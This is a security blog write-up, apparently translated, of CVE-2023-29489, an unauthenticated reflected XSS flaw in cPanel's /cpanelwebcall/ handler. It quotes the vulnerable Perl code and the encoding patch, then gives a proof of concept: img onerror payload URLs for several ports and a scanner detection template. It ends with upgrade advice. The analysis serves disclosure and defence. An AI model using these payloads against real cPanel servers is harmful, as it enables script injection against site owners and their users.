foreword
Any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article shall be borne by the user himself, and the author of the article shall not bear any responsibility for it.
If the sensitive content of the loopholes in the article has a partial impact, please contact the author in time, hope for understanding.
1. Vulnerability principle
Vulnerability brief
cPanel is a set of the most prestigious commercial software in the web hosting industry. It is based on Linux and BSD systems and developed with PHP and is a closed-source software; it provides powerful and complete host management functions, such as: Webmail And a variety of email protocols, web-based FTP management, SSH connection, database management system, DNS management and other remote web-based host management software functions.
This vulnerability can be exploited without authentication, regardless of whether the cPanel management ports 2080, 2082, 2083, and 2086 are open to the outside world
Vulnerability scope
Provider : cPanel
Product : cPanel
Affected versions confirmed : < 11.109.9999.116
Fix versions : 11.109.9999.116, 11.108.0.13, 11.106.0.18, and 11.102.0.31
Vulnerability analysis
The vulnerability of this vulnerability comes from the fact that key variables involved in interaction in the system have not been escaped or filtered, allowing attackers to construct malicious code as input for utilization.
Httpd.pm:
elsif ( 0 == rindex( $doc_path, '/cpanelwebcall/', 0 ) ) {
# First 15 chars are “/cpanelwebcall/”
_serve_cpanelwebcall(
$self->get_server_obj(),
substr( $doc_path, 15 ),
);
}
The above code shows that any path will be routed to, including the character part after the directory.
Which involves the function _serve_cpanelwebcall:
sub _serve_cpanelwebcall ( $server_obj, $webcall_uri_piece ) {
require Cpanel::Server::WebCalls;
my $out = Cpanel::Server::WebCalls::handle($webcall_uri_piece);
$server_obj->respond_200_ok_text($out);
return;
}
The local variable out is the return value of the handle function, which is the processing result of the parameter webcall_uri_piece.
sub handle ($request) {
my $id = extract_id_from_request($request);
substr( $request, 0, length $id ) = q<>;
Cpanel::WebCalls::ID::is_valid($id) or do {
die _http_invalid_params_err("Invalid webcall ID: $id");
};
The handle function mainly extracts the id from the request first, and then processes it according to the id
sub _http_invalid_params_err ($why) {
return Cpanel::Exception::create_raw( 'cpsrvd::BadRequest', $why );
}
The _http_invalid_params_err function mainly returns error messages
Further analysis found that the message_html variable under Httpd::ErrorPage has not been processed and can be exploited by this vulnerability
patch part
In the latest version of cPanel, you can see the fix for this vulnerability
Cpanel/Server/Handlers/Httpd/ErrorPage.pm:
++ use Cpanel::Encoder::Tiny ();
... omitted for brevity ...
++ $var{message_html} = Cpanel::Encoder::Tiny::safe_html_encode_str( $var{message_html} );
2. Vulnerability reproduction in actual combat
Vulnerability recurrence
First take a cPanel target as an example
Then reproduce it according to the POC
POC:
http://example.com/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
http://example.com:2082/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
http://example.com:2086/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
Note: This vulnerability may also exist in other ports
requests:
- method: GET
path:
- '{
{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa'
matchers:
- type: word
words:
- '<img src=x onerror="prompt(1)">'
Execute PoC
Bug fixes
Recommended updates to versions 11.109.9999.116, 11.108.0.13, 11.106.0.18 and 11.102.0.31
Enable cPanel auto-update feature
conclusion
This article mainly introduces the principle analysis and reproduction process of the CVE-2023-29489 cPanel XSS vulnerability. The vulnerability is mainly due to the fact that the key variables involved in the interaction are not escaped or filtered, so that attackers can exploit it without authentication.
Call for original manuscripts
Call for original technical articles, welcome to post
Submission email: [email protected]
Article type: hacker geek technology, information security hotspots, security research and analysis, etc.
If you pass the review and publish it, you can get a remuneration ranging from 200-800 yuan.
For more details, click me to view!
Shooting range practice, click "Read the original text"